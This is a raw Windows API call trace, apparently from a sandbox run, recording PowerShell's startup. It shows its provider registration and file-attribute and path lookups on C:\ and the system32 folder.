	[0292.697] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d2c0 | out: lpFileInformation=0x26d2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.697] SetErrorMode (uMode=0x1) returned 0x1
	[0292.698] GetLogicalDrives () returned 0x4
	[0292.699] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.700] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.700] SetErrorMode (uMode=0x1) returned 0x1
	[0292.711] CoTaskMemAlloc (cb=0x68) returned 0x1b89b5d0
	[0292.711] CoTaskMemAlloc (cb=0x68) returned 0x1b89b410
	[0292.711] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b89b5d0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d290, lpMaximumComponentLength=0x26d28c, lpFileSystemFlags=0x26d288, lpFileSystemNameBuffer=0x1b89b410, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d290*=0x9c354b42, lpMaximumComponentLength=0x26d28c*=0xff, lpFileSystemFlags=0x26d288*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0292.711] CoTaskMemFree (pv=0x1b89b5d0) 
	[0292.711] CoTaskMemFree (pv=0x1b89b410) 
	[0292.711] SetErrorMode (uMode=0x1) returned 0x1
	[0292.711] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.712] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.713] SetErrorMode (uMode=0x1) returned 0x1
	[0292.713] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d230 | out: lpFileInformation=0x26d230*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.713] SetErrorMode (uMode=0x1) returned 0x1
	[0292.713] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.713] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.713] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.714] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.714] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0292.714] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.714] SetErrorMode (uMode=0x1) returned 0x1
	[0292.715] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.715] SetErrorMode (uMode=0x1) returned 0x1
	[0292.715] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.715] SetErrorMode (uMode=0x1) returned 0x1
	[0292.715] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d060 | out: lpFileInformation=0x26d060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.715] SetErrorMode (uMode=0x1) returned 0x1
	[0292.715] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cea0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0292.715] SetErrorMode (uMode=0x1) returned 0x1
	[0292.716] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d100 | out: lpFileInformation=0x26d100*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0292.716] SetErrorMode (uMode=0x1) returned 0x1
	[0292.716] CoTaskMemAlloc (cb=0x804) returned 0x1b8adb30
	[0292.716] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8adb30, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0292.716] CoTaskMemFree (pv=0x1b8adb30) 
	[0292.717] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0292.717] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0292.717] CoTaskMemFree (pv=0x4c3ad0) 
	[0292.717] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e98c88*="FileSystem", lpRawData=0x2e98a18) returned 1
	[0292.744] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.744] CoTaskMemFree (pv=0x517f40) 
	[0292.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.746] CoTaskMemAlloc (cb=0x804) returned 0x1b8adb30
	[0292.746] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8adb30, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0292.746] CoTaskMemFree (pv=0x1b8adb30) 
	[0292.746] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0292.746] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0292.747] CoTaskMemFree (pv=0x4c3ad0) 
	[0292.747] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e9e4c8*="Function", lpRawData=0x2e9e258) returned 1
	[0292.874] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.874] CoTaskMemFree (pv=0x517f40) 
	[0293.585] CoTaskMemAlloc (cb=0x804) returned 0x1b8adb30
	[0293.585] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8adb30, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0293.585] CoTaskMemFree (pv=0x1b8adb30) 
	[0293.585] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0293.585] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0293.586] CoTaskMemFree (pv=0x4c3ad0) 
	[0293.586] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed08a0*="Registry", lpRawData=0x2ed0630) returned 1
	[0293.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0293.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0293.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0293.760] CoTaskMemAlloc (cb=0x804) returned 0x1b8adb30
	[0293.760] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8adb30, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0293.761] CoTaskMemFree (pv=0x1b8adb30) 
	[0293.761] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0293.761] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0293.761] CoTaskMemFree (pv=0x4c3ad0) 
	[0293.762] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed5cb8*="Variable", lpRawData=0x2ed5a48) returned 1
	[0293.837] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0293.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.837] CoTaskMemFree (pv=0x517f40) 
	[0293.840] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0293.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.840] CoTaskMemFree (pv=0x517f40) 
	[0293.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0293.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0293.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0293.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0294.535] CoTaskMemAlloc (cb=0x804) returned 0x1b8ba750
	[0294.535] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ba750, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0294.536] CoTaskMemFree (pv=0x1b8ba750) 
	[0294.536] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0294.536] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0294.537] CoTaskMemFree (pv=0x4c3ad0) 
	[0294.537] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ee98d0*="Certificate", lpRawData=0x2ee9660) returned 1
	[0295.084] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.084] CoTaskMemFree (pv=0x517f40) 
	[0295.087] GetLogicalDrives () returned 0x4
	[0295.087] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.087] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0295.088] CoTaskMemAlloc (cb=0x20e) returned 0x513c20
	[0295.089] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x513c20 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0295.089] CoTaskMemFree (pv=0x513c20) 
	[0295.090] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.090] CoTaskMemFree (pv=0x517f40) 
	[0295.090] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.091] CoTaskMemFree (pv=0x517f40) 
	[0295.107] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.107] CoTaskMemFree (pv=0x517f40) 
	[0295.108] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.108] CoTaskMemFree (pv=0x517f40) 
	[0295.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.108] SetErrorMode (uMode=0x1) returned 0x1
	[0295.108] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.109] SetErrorMode (uMode=0x1) returned 0x1
	[0295.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.109] SetErrorMode (uMode=0x1) returned 0x1
	[0295.109] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.109] SetErrorMode (uMode=0x1) returned 0x1
	[0295.109] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0295.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.109] CoTaskMemFree (pv=0x517f40) 
	[0295.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.720] SetErrorMode (uMode=0x1) returned 0x1
	[0295.720] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.720] SetErrorMode (uMode=0x1) returned 0x1
	[0295.720] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.720] SetErrorMode (uMode=0x1) returned 0x1
	[0295.721] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0295.721] SetErrorMode (uMode=0x1) returned 0x1
	[0295.721] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.721] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0295.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.721] SetErrorMode (uMode=0x1) returned 0x1
	[0295.721] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.721] SetErrorMode (uMode=0x1) returned 0x1
	[0295.721] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.722] SetErrorMode (uMode=0x1) returned 0x1
	[0295.722] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.722] SetErrorMode (uMode=0x1) returned 0x1
	[0295.722] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.722] SetErrorMode (uMode=0x1) returned 0x1
	[0295.722] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.723] SetErrorMode (uMode=0x1) returned 0x1
	[0295.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.723] SetErrorMode (uMode=0x1) returned 0x1
	[0295.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x26d110 | out: lpFileInformation=0x26d110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0295.723] SetErrorMode (uMode=0x1) returned 0x1
	[0295.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x26cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x26ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0295.724] SetErrorMode (uMode=0x1) returned 0x1
	[0295.724] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.724] SetErrorMode (uMode=0x1) returned 0x1
	[0295.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0295.724] SetErrorMode (uMode=0x1) returned 0x1
	[0295.724] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x26d150 | out: lpFileInformation=0x26d150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0295.724] SetErrorMode (uMode=0x1) returned 0x1
	[0295.724] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x26cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
